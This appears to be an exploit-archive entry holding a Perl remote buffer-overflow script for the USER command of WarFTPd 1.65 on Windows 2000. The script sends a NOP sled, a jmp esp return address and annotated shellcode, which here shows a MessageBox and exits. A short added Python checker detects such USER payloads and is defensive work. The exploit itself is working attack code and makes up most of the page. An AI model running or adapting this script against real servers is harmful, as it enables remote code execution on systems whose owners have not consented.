war-ftpd-bof.pl

29 May 2002. Reported by Kago. Type: packetstorm. Source: packetstormsecurity.com

Exploitation script by kago for a remote buffer overflow in the USER command of WarFTPd 1.65 on Windows 2000.

Code
```perl
use IO::Socket;   # also exports Socket's inet_aton, sockaddr_in, PF_INET and SOCK_STREAM
$port=21;
$|=1;

#Kernel32 jmp esp 7754a3ab
#Kernel32 MessageBoxA 77e375d5
#MSVCRT c_exit 78003985


print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n";
print "\tEnter The Target IP :";

$ip = <STDIN>;
chomp $ip;


$host = inet_aton($ip);
$ServerAddr = sockaddr_in($port, $host);
$protocol_name = "tcp";
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
select(CLIENT); $|=1; select(STDOUT);
if(connect(CLIENT, $ServerAddr)) {
send(CLIENT,"user ",0);

send(CLIENT,"\x90"x485,0); #485 nops to overwrite EIP
send(CLIENT,"\xab\xa3\x54\x77",0); #Overwriting EIP with "jmp esp" address via Kernel32.dll
send(CLIENT,"\x90"x5,0); #some NOPs for padding - the "jmp esp" steps to the last nop at 0098fd9c

send(CLIENT,"\x55",0); #push ebp - starting something new
send(CLIENT,"\x8b\xec",0); #mov ebp,esp
send(CLIENT,"\x33\xff",0); #xor edi,edi - edi = 0
send(CLIENT,"\x57",0); #push edi

send(CLIENT,"\xc6\x45\xfc\x48",0); #mov byte ptr [ebp-0x4],0x48 - H
send(CLIENT,"\xc6\x45\xfd\x69",0); #mov byte ptr [ebp-0x3],0x69 - i
send(CLIENT,"\xc6\x45\xfe\x21",0); #mov byte ptr [ebp-0x2],0x21 - !


send(CLIENT,"\xba\xd5\x75\xe3\x77",0); #mov edx, 0x77e375d5 - MessageBoxA to edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x57",0); #push edi
send(CLIENT,"\x8d\x55\xfc",0); #lea edx,[ebp-0x4] - address of "Hi!" to edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x52",0); #push edx

send(CLIENT,"\x57",0); #push edi
send(CLIENT,"\xff\x55\xf8",0); #call dword ptr [ebp-0x8]
send(CLIENT,"\x55",0); #push ebp - Start the exit stuff so we don't crash
send(CLIENT,"\x8b\xec",0); #mov ebp,esp
send(CLIENT,"\xba\x86\x41\x01\x89",0); #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls
send(CLIENT,"\x81\xea\x01\x08\x01\x11",0); #sub edx, 0x11010201 - My leet-o way to get to the address with the null
send(CLIENT,"\x52",0); #push edx
send(CLIENT,"\x33\xc0",0); #xor eax,eax
send(CLIENT,"\x50",0); #push eax
send(CLIENT,"\xff\x55\xfc",0); #call dword ptr [ebp-0x4]

send(CLIENT,"\n",0);

close(CLIENT);

}
```
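As an added defender-side example (not part of kago's script), a small Python checker that flags FTP control-channel commands with the shape of the overflow above: an oversized USER argument, a run of 0x90 NOP bytes, and non-printable bytes where a username should be. The 128-byte length cap and the sample session are constructed assumptions, and only the sled and return-address bytes of the payload are reproduced.

```python
import re
from dataclasses import dataclass

# The payload above sends a 485-byte USER argument; legitimate usernames are far
# shorter, so cap the argument length (the 128-byte threshold is an assumption).
MAX_ARG_LEN = 128
NOP_RUN_RE = re.compile(rb"\x90{16,}")   # 16+ consecutive x86 NOPs: classic sled
_PRINTABLE = set(range(0x20, 0x7F))      # printable ASCII expected in FTP arguments

@dataclass
class Finding:
    verb: str
    arg_len: int
    reasons: list

def parse_ftp_command(line: bytes):
    """Split one FTP control-channel line into (VERB, raw argument bytes)."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    return verb.upper().decode("ascii", "replace"), arg

def inspect_ftp_command(line: bytes, max_arg_len: int = MAX_ARG_LEN):
    """Return a Finding when the command looks like an overflow attempt, else None."""
    verb, arg = parse_ftp_command(line)
    reasons = []
    if len(arg) > max_arg_len:
        reasons.append(f"argument length {len(arg)} exceeds {max_arg_len}")
    if NOP_RUN_RE.search(arg):
        reasons.append("run of 0x90 bytes (possible NOP sled)")
    non_printable = sum(1 for b in arg if b not in _PRINTABLE)
    if non_printable:
        reasons.append(f"{non_printable} non-printable bytes in argument")
    return Finding(verb, len(arg), reasons) if reasons else None

def scan_session(lines):
    """Run the check over every line of a captured control-channel session."""
    return [f for f in (inspect_ftp_command(l) for l in lines) if f]

# Constructed sample session: a benign login followed by a USER line shaped like
# the overflow above (485-byte NOP sled plus the 4-byte return address; the rest
# of the payload is omitted).
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"user " + b"\x90" * 485 + b"\xab\xa3\x54\x77" + b"\n",
]

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f"ALERT {f.verb} arg_len={f.arg_len}: " + "; ".join(f.reasons))
```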

Vulners AI Score: 7.4 (High risk)